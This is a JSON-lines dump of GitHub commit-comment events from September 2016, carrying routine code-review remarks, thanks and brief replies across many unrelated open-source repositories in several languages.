{"id":"4544060445","type":"CommitCommentEvent","actor":{"login":"felipereis12"},"repo":{"name":"felipereis12/Todo-list-de-repositorio-do-github"},"payload":{"comment":{"id":18973664,"position":null,"line":null,"path":null,"commit_id":"6ad20300ae50ed3449f939a765c093ebc879a805","created_at":"2016-09-10T13:33:15Z","updated_at":"2016-09-10T13:33:15Z","body":"Boas"}},"created_at":"2016-09-10T13:33:15Z"}
{"id":"4544060965","type":"CommitCommentEvent","actor":{"login":"NoctuaNivalis"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":18973665,"position":null,"line":null,"path":null,"commit_id":"b5b1b5a675eb901b9185e01128c368daf12c48fe","created_at":"2016-09-10T13:33:41Z","updated_at":"2016-09-10T13:33:41Z","body":"Use `curl wttr.in`, as Jens suggested."}},"created_at":"2016-09-10T13:33:41Z"}
{"id":"4544063666","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":18973670,"position":null,"line":null,"path":null,"commit_id":"a5aa06a1dc9148658256793d8b444a5f2eb77de2","created_at":"2016-09-10T13:35:37Z","updated_at":"2016-09-10T13:35:37Z","body":"What do you mean by enable it? With this, it will automatically get enabled. Stay tuned for the release. You will get to know."}},"created_at":"2016-09-10T13:35:37Z"}
{"id":"4544064113","type":"CommitCommentEvent","actor":{"login":"MareoRaft"},"repo":{"name":"ghseeli/grad-school-notes"},"payload":{"comment":{"id":18973672,"position":null,"line":null,"path":null,"commit_id":"e4f12030d2b25946fe97b0dbae03644365c5bc52","created_at":"2016-09-10T13:35:57Z","updated_at":"2016-09-10T13:35:57Z","body":"awesome stuff!"}},"created_at":"2016-09-10T13:35:57Z"}
{"id":"4544065226","type":"CommitCommentEvent","actor":{"login":"Mrcactuseater"},"repo":{"name":"nathanchance/Ninja-Kernel-Bullhead"},"payload":{"comment":{"id":18973675,"position":null,"line":null,"path":null,"commit_id":"dce6f03882507499d243901e8255134216593b03","created_at":"2016-09-10T13:36:42Z","updated_at":"2016-09-10T13:36:42Z","body":"Hypeeee"}},"created_at":"2016-09-10T13:36:42Z"}
{"id":"4544065278","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic_part2"},"payload":{"comment":{"id":18973676,"position":null,"line":null,"path":null,"commit_id":"28283f8e5e3a9ba4ece84d152f041cf2416c06e1","created_at":"2016-09-10T13:36:44Z","updated_at":"2016-09-10T13:36:44Z","body":"Было бы логичней расположить проект в корне без каталога `edispatcher`."}},"created_at":"2016-09-10T13:36:44Z"}
{"id":"4544065810","type":"CommitCommentEvent","actor":{"login":"ShadowDragonX"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":18973679,"position":null,"line":null,"path":null,"commit_id":"b4ef565aee65d1cb2524d77f503fcf1ff90ebe7f","created_at":"2016-09-10T13:37:06Z","updated_at":"2016-09-10T13:37:06Z","body":"- Noblesse: Awakening\r\n- Noblesse: The Beginning of Destruction [Korean Dub]"}},"created_at":"2016-09-10T13:37:06Z"}
{"id":"4544066617","type":"CommitCommentEvent","actor":{"login":"alperklc"},"repo":{"name":"alperklc/pFi"},"payload":{"comment":{"id":18973680,"position":null,"line":null,"path":null,"commit_id":"e7d7a54883d3d14eae7651c07d0e2fe05c434818","created_at":"2016-09-10T13:37:40Z","updated_at":"2016-09-10T13:37:40Z","body":"**side menu html and js**\r\n-  added show add modal button on the header bar\r\n\r\n**add modal**\r\n- replaced 2-modals with the unified one\r\n\r\n**records page**\r\n- replaced add buttons\r\n- added colourings for items on the list\r\n\r\n**reports page**\r\n- fixed scroll problem on the big desktop screens\r\n\r\n**autocomplete**\r\n- replaced definitions on $scope with angular.extend\r\n- added focus on first input\r\n- added auto direction/payment method/currency selections\r\n- fixed filterings\r\n- added title\r\n\r\n"}},"created_at":"2016-09-10T13:37:40Z"}
{"id":"4544066922","type":"CommitCommentEvent","actor":{"login":"aasiimweDataCare"},"repo":{"name":"aasiimweDataCare/Dev_ftf"},"payload":{"comment":{"id":18973681,"position":null,"line":null,"path":null,"commit_id":"532908ae9e316dee83a51f9d1dc3081f767b9b0d","created_at":"2016-09-10T13:37:51Z","updated_at":"2016-09-10T13:37:51Z","body":"commited version after working on the form2 reporting period filters and delete functionality"}},"created_at":"2016-09-10T13:37:51Z"}
{"id":"4544067231","type":"CommitCommentEvent","actor":{"login":"ShadowDragonX"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":18973682,"position":null,"line":null,"path":null,"commit_id":"e967fc5c801ca5888529116e0177bfae06b2098c","created_at":"2016-09-10T13:38:04Z","updated_at":"2016-09-10T13:38:04Z","body":"- Blood-C\r\n- Devil Survivor 2 The Animation"}},"created_at":"2016-09-10T13:38:04Z"}
{"id":"4544067904","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic_part2"},"payload":{"comment":{"id":18973683,"position":4,"line":4,"path":"edispatcher/db/migrate/20160910090543_create_trains.rb","commit_id":"28283f8e5e3a9ba4ece84d152f041cf2416c06e1","created_at":"2016-09-10T13:38:33Z","updated_at":"2016-09-10T13:38:33Z","body":"Я думаю, номер может быть не только числом."}},"created_at":"2016-09-10T13:38:33Z"}
{"id":"4544069146","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18973688,"position":null,"line":null,"path":null,"commit_id":"3aacc34b3338e163e34da7f24b7f0cd3995592c7","created_at":"2016-09-10T13:39:32Z","updated_at":"2016-09-10T13:39:32Z","body":"@atamariya What about **.mk3d** (Matroska 3D video video/x-matroska-3d) and **.mka** (Matroska audio audio/x-matroska) ?\r\nhttps://matroska.org/technical/specs/notes.html\r\n\r\n**P.S.** Happily a standard will come soon: https://tools.ietf.org/html/draft-lhomme-cellar-matroska-00"}},"created_at":"2016-09-10T13:39:32Z"}
{"id":"4544069615","type":"CommitCommentEvent","actor":{"login":"ian57"},"repo":{"name":"recalbox/recalbox-buildroot"},"payload":{"comment":{"id":18973689,"position":null,"line":null,"path":null,"commit_id":"994ab8c6467a0e11e0e603aafbc3c01744711bbe","created_at":"2016-09-10T13:39:53Z","updated_at":"2016-09-10T13:39:53Z","body":"Hello, \r\n\r\nfor package/libretro-picodrive/libretro-picodrive.mk the Raspi optimization doean not work, since Makefile.libretro doas not have these option. The only available option in the file is \"raspberrypi\" and not armv6 etc."}},"created_at":"2016-09-10T13:39:53Z"}
{"id":"4544070043","type":"CommitCommentEvent","actor":{"login":"xithan"},"repo":{"name":"wagn/wagn"},"payload":{"comment":{"id":18973690,"position":5,"line":128,"path":"card/mod/pointer/set/abstract/01_pointer.rb","commit_id":"cd8078eaf6a77b844d2c95d70081f4237a9a20cc","created_at":"2016-09-10T13:40:14Z","updated_at":"2016-09-10T13:40:14Z","body":"that's wrong. `:pointer` is correct. That's not about card format it's about the diff format. See `lcs_opts_for_format`"}},"created_at":"2016-09-10T13:40:14Z"}
{"id":"4544071049","type":"CommitCommentEvent","actor":{"login":"xithan"},"repo":{"name":"wagn/wagn"},"payload":{"comment":{"id":18973691,"position":5,"line":128,"path":"card/mod/pointer/set/abstract/01_pointer.rb","commit_id":"cd8078eaf6a77b844d2c95d70081f4237a9a20cc","created_at":"2016-09-10T13:41:00Z","updated_at":"2016-09-10T13:41:00Z","body":"This was used in `raw_view` as card format but I fixed that. "}},"created_at":"2016-09-10T13:41:00Z"}
{"id":"4544071999","type":"CommitCommentEvent","actor":{"login":"hemanth"},"repo":{"name":"hemanth/generator-pwa"},"payload":{"comment":{"id":18973692,"position":9,"line":4,"path":"generators/app/templates/js/push.js","commit_id":"847095df72eabe4546e7ee60ba7b6f29494be627","created_at":"2016-09-10T13:41:41Z","updated_at":"2016-09-10T13:41:41Z","body":"Let us not have any UI for push notifications?\r\n\r\nAs the browser itself prompts the user for subscription."}},"created_at":"2016-09-10T13:41:41Z"}
{"id":"4544072027","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18973693,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T13:41:43Z","updated_at":"2016-09-10T13:41:43Z","body":"   #debug(\"Fix permissions: {}\".format(path))\r\n\r\nRegarding the chroot/run directory permissions, I don't know if this is perhaps fixed directly at run dir creation? Pacman throws a filesystem permission mismatch warning, not sure how other distros would behave if the package managment backend was more flexible."}},"created_at":"2016-09-10T13:41:43Z"}
{"id":"4544072141","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic_part2"},"payload":{"comment":{"id":18973694,"position":4,"line":4,"path":"edispatcher/config/routes.rb","commit_id":"28283f8e5e3a9ba4ece84d152f041cf2416c06e1","created_at":"2016-09-10T13:41:47Z","updated_at":"2016-09-10T13:41:47Z","body":"Если уже указали `root` маршрут, то этот можно не указывать."}},"created_at":"2016-09-10T13:41:47Z"}
{"id":"4544074696","type":"CommitCommentEvent","actor":{"login":"wpdelighter"},"repo":{"name":"ultimatemember/ultimatemember"},"payload":{"comment":{"id":18973696,"position":16,"line":162,"path":"core/um-members.php","commit_id":"a85a687ba7f78c45af2777535e1e67cbe3dd1104","created_at":"2016-09-10T13:43:24Z","updated_at":"2016-09-10T13:43:24Z","body":"This prevents running two different calls to `get_members` with different parameters.\r\n\r\nI want to display list of all users' ids & names ( for selected roles in backend ) on top of members directory page irrespective which page number I am on. How can I achieve that ? Settings ` $args['page'] = 1` & `$args['profiles_per_page']` doesn't work as `$args['page']` is overriden by `$_REQUEST['members_page']`."}},"created_at":"2016-09-10T13:43:24Z"}
{"id":"4544077363","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":18973698,"position":17,"line":28,"path":"lilacrun","commit_id":"ea0c33e3f9a7e1bab3071bc0496674f051511670","created_at":"2016-09-10T13:45:24Z","updated_at":"2016-09-10T13:45:24Z","body":"找到了，参见 https://github.com/koalaman/shellcheck/wiki/SC2155"}},"created_at":"2016-09-10T13:45:24Z"}
{"id":"4544077371","type":"CommitCommentEvent","actor":{"login":"saraervik"},"repo":{"name":"robertab/dd1352"},"payload":{"comment":{"id":18973699,"position":null,"line":null,"path":null,"commit_id":"9fa442b114208076f988835b5d485f8613f9a1bc","created_at":"2016-09-10T13:45:24Z","updated_at":"2016-09-10T13:45:24Z","body":"@robertab yttepytte förändring, men tänker jag fel? tidigare fick det första ordet \"alltid\" förekomst 0?"}},"created_at":"2016-09-10T13:45:24Z"}
{"id":"4544079186","type":"CommitCommentEvent","actor":{"login":"djragusa"},"repo":{"name":"djragusa/djragusa.github.io"},"payload":{"comment":{"id":18973700,"position":null,"line":null,"path":null,"commit_id":"3d80ecda718bc10a1f41d07565a962ec4ca89a9a","created_at":"2016-09-10T13:46:40Z","updated_at":"2016-09-10T13:46:40Z","body":"Unwind template"}},"created_at":"2016-09-10T13:46:40Z"}
{"id":"4544083008","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18973706,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T13:49:27Z","updated_at":"2016-09-10T13:49:27Z","body":"@abc612008 然而UDP自己处理掉包更意味着更大的灵活性\r\n一个必须保证到达的数据包一定不会需要短时间内大量发送的，比如打开箱子\r\n需要短时间内大量发送的，比如移动包，都是不需要确保一定到达的，因为玩家会连续的发出移动指令，就算丢包30%都不会出现问题\r\n而用TCP的话，就假设了所有的包都必须到达，这样移动包所带来的消耗就非常明显了"}},"created_at":"2016-09-10T13:49:27Z"}
{"id":"4544083848","type":"CommitCommentEvent","actor":{"login":"RoccoDeveloping"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18973709,"position":null,"line":null,"path":null,"commit_id":"380f5d6f8704261c45fe224738164f59587cef37","created_at":"2016-09-10T13:50:01Z","updated_at":"2016-09-10T13:50:01Z","body":"FYI, the past tense of to catch is caught, not catched."}},"created_at":"2016-09-10T13:50:01Z"}
{"id":"4544086463","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18973714,"position":13,"line":174,"path":"ydkgen/printer/cpp/header_printer.py","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-10T13:51:50Z","updated_at":"2016-09-10T13:51:50Z","body":"Agreed. Probably something like..\r\n\r\n`EntityPath get_relative_entity_path(ydk::Entity* ancestor) const;`"}},"created_at":"2016-09-10T13:51:50Z"}
{"id":"4544088476","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18973715,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T13:53:18Z","updated_at":"2016-09-10T13:53:18Z","body":"ToDo:\r\n\r\nWe should consider a better mirror ranking strategy\r\nPerhaps have a ranking module? Postcfg also tried to rank, thus its set false here\r\nHowever, with bad luck due to mirror randomizer in live-mirrors script, this can be problematic"}},"created_at":"2016-09-10T13:53:18Z"}
{"id":"4544089352","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18973716,"position":8,"line":279,"path":"src/world/map.h","commit_id":"9f4a70d642bc9f276abe385f56f7c679468c588b","created_at":"2016-09-10T13:53:55Z","updated_at":"2016-09-10T13:53:55Z","body":"Doesn't look like packing it is required, at least based on variables used in this commit."}},"created_at":"2016-09-10T13:53:55Z"}
{"id":"4544089924","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973718,"position":13,"line":10,"path":"release/Magarena/scripts/Rancor.txt","commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T13:54:18Z","updated_at":"2016-09-10T13:54:18Z","body":"The 'from the graveyard' part is important, otherwise 'return SN' means return the permanent or spell."}},"created_at":"2016-09-10T13:54:18Z"}
{"id":"4544091285","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18973721,"position":null,"line":null,"path":null,"commit_id":"090176fb96a3bf43b0c6963ccd1ebf6353d8ab79","created_at":"2016-09-10T13:55:17Z","updated_at":"2016-09-10T13:55:17Z","body":"Yep, it was hidden."}},"created_at":"2016-09-10T13:55:17Z"}
{"id":"4544092495","type":"CommitCommentEvent","actor":{"login":"ssehovic"},"repo":{"name":"CM-Tab-S/android_kernel_samsung_klimtwifi"},"payload":{"comment":{"id":18973723,"position":null,"line":null,"path":null,"commit_id":"8f481c51cb8add960329110f523989a7cbc60616","created_at":"2016-09-10T13:56:09Z","updated_at":"2016-09-10T13:56:09Z","body":"These firmware .fw files are breaking build. Must be deleted."}},"created_at":"2016-09-10T13:56:09Z"}
{"id":"4544092696","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18973724,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T13:56:17Z","updated_at":"2016-09-10T13:56:17Z","body":"That what I do can be better explained by following code which is equivalent and more neat (but probably not as fast):\r\n\r\n`\r\n...\r\nif (type_of(m) == ENPASSANT)\r\n{\r\n       occupied ^= to - pawn_push(stm); // Remove the captured pawn\r\n       swapList[0] = PieceValue[MG][PAWN];\r\n }\r\nelse if (piece_on(to)) \r\n    occupied ^= to; // clear the exchange square bit, while this is irrelevant for the normal SEE, it is important for the case where the pinned piece could strike against the pinner placed on the to-square.\r\n\r\n...\r\n// first term detects potential pinned pieces, second one verifies if all pinners are still on board \r\nif (stmAttackers & st->blockersForKing[stm] && ((st->pinnersForKing[stm] & occupied ) == st->pinnersForKing[stm])))\r\nstmAttackers = stmAttackers & ~st->blockersForKing[stm]; // remove the pinned piece from attackers as it can't attack (illegal move)\r\n` \r\n\r\nFor simplicity I consider pins only as long all pinners (in most cases zero or one) are still on board.\r\nAs soon a pinner disappears from its original square (this is tracked in occupied bitboard) I'm not sure anymore if the pinned pieces are still pinned so I fall back to normal SEE.\r\nThe rare case when there are more pinners and also more pinned pieces is to complicate to solve and not worth it IMO to be implemented. I hope now it is a little bit clearer."}},"created_at":"2016-09-10T13:56:17Z"}
{"id":"4544092844","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973725,"position":13,"line":10,"path":"release/Magarena/scripts/Undying_Rage.txt","commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T13:56:25Z","updated_at":"2016-09-10T13:56:25Z","body":"Same issue as Rancor. The commit message is misleading, more than image URL are updated."}},"created_at":"2016-09-10T13:56:25Z"}
{"id":"4544093298","type":"CommitCommentEvent","actor":{"login":"Rich-Harris"},"repo":{"name":"rollup/rollupjs.org"},"payload":{"comment":{"id":18973727,"position":null,"line":null,"path":null,"commit_id":"ba7abfa9da8755c3760c18d8bc74b2e7b978625d","created_at":"2016-09-10T13:56:48Z","updated_at":"2016-09-10T13:56:48Z","body":"@evs-chris good catch! updated, thanks"}},"created_at":"2016-09-10T13:56:48Z"}
{"id":"4544094426","type":"CommitCommentEvent","actor":{"login":"rossdotparker"},"repo":{"name":"GibbonEdu/core"},"payload":{"comment":{"id":18973728,"position":null,"line":null,"path":null,"commit_id":"9f0fe23468821dce77278b4936f26636cfcb8756","created_at":"2016-09-10T13:57:38Z","updated_at":"2016-09-10T13:57:38Z","body":"Craig, this is a very elegant solution, thanks! I think you have committed this to the master, which is not currently under development, but I can't see it as the last commit on the tracking file /modules/School Admin/trackingSettings.php when I browse the master branch. Which is odd.\r\n\r\nAt any rate, I have made the same change the v13 branch, as shown in the link below:\r\n\r\nhttps://github.com/GibbonEdu/core/commit/2cfcd7228264c568db48310ef9da9477e3daeaa5\r\n\r\nCan you please roll back this commit, if it was indeed to the master branch?\r\n\r\nCheers."}},"created_at":"2016-09-10T13:57:38Z"}
{"id":"4544096443","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973731,"position":13,"line":10,"path":"release/Magarena/scripts/Rancor.txt","commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T13:59:13Z","updated_at":"2016-09-10T13:59:13Z","body":"arg - yes, missed that - thanks, will fix."}},"created_at":"2016-09-10T13:59:13Z"}
{"id":"4544098605","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18973734,"position":null,"line":null,"path":null,"commit_id":"2d778759ccede32cb55a84eed1f5d97b43ad2394","created_at":"2016-09-10T14:00:32Z","updated_at":"2016-09-10T14:00:32Z","body":"Don't get why this was added before. **Calamares-Server** is only in our **testing** or **unstable** branch. For that only this https://github.com/manjaro/manjaro-tools-iso-profiles/commit/d4b0f37d32e34204ed4109e33dafc7301fb6089d was needed to get rid of the conflict. However with **stable** the **aiptek** driver is still there ..."}},"created_at":"2016-09-10T14:00:32Z"}
{"id":"4544100668","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973736,"position":12,"line":10,"path":"release/Magarena/scripts/Pacifism.txt","commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:02:01Z","updated_at":"2016-09-10T14:02:01Z","body":"This line should not be removed."}},"created_at":"2016-09-10T14:02:01Z"}
{"id":"4544101655","type":"CommitCommentEvent","actor":{"login":"Ticcix"},"repo":{"name":"Ticcix/Share-Ticcix"},"payload":{"comment":{"id":18973737,"position":4,"line":36,"path":"buttons.html","commit_id":"85c8855f7c7bc524cd2b58c34d902d4002d01924","created_at":"2016-09-10T14:02:43Z","updated_at":"2016-09-10T14:02:43Z","body":"#"}},"created_at":"2016-09-10T14:02:43Z"}
{"id":"4544104683","type":"CommitCommentEvent","actor":{"login":"hamsternik"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18973738,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-10T14:04:45Z","updated_at":"2016-09-10T14:04:45Z","body":"Such a good answer, man!"}},"created_at":"2016-09-10T14:04:45Z"}
{"id":"4544104918","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973740,"position":13,"line":10,"path":"release/Magarena/scripts/Rancor.txt","commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:04:55Z","updated_at":"2016-09-10T14:04:55Z","body":"I've fixed it, commit incoming"}},"created_at":"2016-09-10T14:04:55Z"}
{"id":"4544105528","type":"CommitCommentEvent","actor":{"login":"lianglee"},"repo":{"name":"opensource-socialnetwork/opensource-socialnetwork"},"payload":{"comment":{"id":18973742,"position":7,"line":388,"path":"components/OssnPhotos/ossn_com.php","commit_id":"9e656aa68f808ca9ef7b132a6280b67f4d18da4f","created_at":"2016-09-10T14:05:21Z","updated_at":"2016-09-10T14:05:21Z","body":"ossnphotos get cover type 1 not working #943"}},"created_at":"2016-09-10T14:05:21Z"}
{"id":"4544106690","type":"CommitCommentEvent","actor":{"login":"matiboux"},"repo":{"name":"OliFramework/Oli"},"payload":{"comment":{"id":18973743,"position":27,"line":3617,"path":"includes/OliCore.php","commit_id":"69f33fb28c551094d69aa8234c93042f4326e478","created_at":"2016-09-10T14:06:14Z","updated_at":"2016-09-10T14:06:14Z","body":"### We have hashes, so we don't need a long auth key anymore\r\n\r\n**But why a 28-characters long auth key?**\r\nI have a personal reason to this..\r\nSo I'm just tell you that it comes from a little thing which is very important to me."}},"created_at":"2016-09-10T14:06:14Z"}
{"id":"4544106986","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18973744,"position":null,"line":null,"path":null,"commit_id":"c62d87301a16e6fef4235f9d9c19296b8d8cfcc1","created_at":"2016-09-10T14:06:28Z","updated_at":"2016-09-10T14:06:28Z","body":"thanks a lot dream \r\nkeep up!"}},"created_at":"2016-09-10T14:06:28Z"}
{"id":"4544107896","type":"CommitCommentEvent","actor":{"login":"haniusif"},"repo":{"name":"haniusif/laravelbuilder"},"payload":{"comment":{"id":18973747,"position":null,"line":null,"path":null,"commit_id":"691cf7c7aae8e746971063503458e7007dc65376","created_at":"2016-09-10T14:07:10Z","updated_at":"2016-09-10T14:07:10Z","body":"d"}},"created_at":"2016-09-10T14:07:10Z"}
{"id":"4544108236","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973748,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:07:27Z","updated_at":"2016-09-10T14:07:27Z","body":"I've pushed fixes for the errors introduced in this commit. Please separate functional changes (ability text, etc) from image URL changes. Having these changes intermixed makes it very hard to notice the errors.\r\n\r\nCould you a wiki page on image URL updating? I must have asked you about the process before but now I don't remember it, it would be best if we have this on our wiki page so that we the way to do it."}},"created_at":"2016-09-10T14:07:27Z"}
{"id":"4544109476","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973749,"position":13,"line":12,"path":"release/Magarena/scripts_missing/Toxic_Deluge.txt","commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:08:22Z","updated_at":"2016-09-10T14:08:22Z","body":"typo in the word 'supported'. Fix pushed."}},"created_at":"2016-09-10T14:08:22Z"}
{"id":"4544111498","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18973750,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T14:09:51Z","updated_at":"2016-09-10T14:09:51Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T14:09:51Z"}
{"id":"4544114302","type":"CommitCommentEvent","actor":{"login":"menglecho"},"repo":{"name":"menglecho/cplusplusPrimer5thedition"},"payload":{"comment":{"id":18973755,"position":null,"line":null,"path":null,"commit_id":"cce11e55a382e11c3c63d86344ae3e63093f07a9","created_at":"2016-09-10T14:11:44Z","updated_at":"2016-09-10T14:11:44Z","body":"constructor"}},"created_at":"2016-09-10T14:11:44Z"}
{"id":"4544119327","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973760,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:15:18Z","updated_at":"2016-09-10T14:15:18Z","body":"Sorry about those errors - been having to go through manually due to the image overrides in the scriptbuilder - then working backwards to remove ones no longer needed. Still not done :sad:\r\n\r\nWith the image overrides, I'm not over sure whether they should be there or not, card text isn't changing, but the urls for crops and other languages will be used for downloads. I guess in a way they should be there as a prompt do download, but only for non-english, and links which now point to a cropped image."}},"created_at":"2016-09-10T14:15:18Z"}
{"id":"4544121439","type":"CommitCommentEvent","actor":{"login":"OlegIlyenko"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18973763,"position":26,"line":40,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-10T14:16:50Z","updated_at":"2016-09-10T14:16:50Z","body":"Should we also add an `operationName` to the list of the request fields and query parameters that server is expected to  handle (POST and GET)?"}},"created_at":"2016-09-10T14:16:50Z"}
{"id":"4544121453","type":"CommitCommentEvent","actor":{"login":"dogergdi"},"repo":{"name":"dogergdi/jansolo"},"payload":{"comment":{"id":18973764,"position":null,"line":null,"path":null,"commit_id":"0d9e6b0dce2125f616ece6d807709f0bd7daab6f","created_at":"2016-09-10T14:16:51Z","updated_at":"2016-09-10T14:16:51Z","body":"nO MUY MAL"}},"created_at":"2016-09-10T14:16:51Z"}
{"id":"4544122241","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973765,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:17:29Z","updated_at":"2016-09-10T14:17:29Z","body":"With the graveyard recursion, found other auras which didn't specify. I've edited them to match, but I was fairly sure that they weren't needed."}},"created_at":"2016-09-10T14:17:29Z"}
{"id":"4544122256","type":"CommitCommentEvent","actor":{"login":"ekkimosi"},"repo":{"name":"deltaxflux/fluxion"},"payload":{"comment":{"id":18973766,"position":null,"line":null,"path":null,"commit_id":"52619f5f97fc6d7aab979462d3f5efcafb21822e","created_at":"2016-09-10T14:17:30Z","updated_at":"2016-09-10T14:17:30Z","body":"Thank you for your nice work! Can we hope to italian translation?\r\nI will be glad helping you. \r\nRegards. "}},"created_at":"2016-09-10T14:17:30Z"}
{"id":"4544123379","type":"CommitCommentEvent","actor":{"login":"dogergdi"},"repo":{"name":"dogergdi/jansolo"},"payload":{"comment":{"id":18973767,"position":null,"line":null,"path":null,"commit_id":"0d9e6b0dce2125f616ece6d807709f0bd7daab6f","created_at":"2016-09-10T14:18:15Z","updated_at":"2016-09-10T14:18:15Z","body":"lo que paso"}},"created_at":"2016-09-10T14:18:15Z"}
{"id":"4544123916","type":"CommitCommentEvent","actor":{"login":"sangmokang"},"repo":{"name":"fc-pwp/s3-concon"},"payload":{"comment":{"id":18973768,"position":1,"line":1,"path":"quiz/templates/list_quiz.html","commit_id":"375acaba0b5172e758b0fcbe0883bd740c4a1741","created_at":"2016-09-10T14:18:36Z","updated_at":"2016-09-10T14:18:36Z","body":"wow doctype"}},"created_at":"2016-09-10T14:18:36Z"}
{"id":"4544126598","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18973777,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T14:20:30Z","updated_at":"2016-09-10T14:20:30Z","body":"If possible post this warning message of **pacman** regarding the **/run** dir ..."}},"created_at":"2016-09-10T14:20:30Z"}
{"id":"4544126634","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973778,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:20:32Z","updated_at":"2016-09-10T14:20:32Z","body":"Thanks for catching the other ones. I totally missed those. Were they tested in a game and found to work with the 'from graveyard' part?"}},"created_at":"2016-09-10T14:20:32Z"}
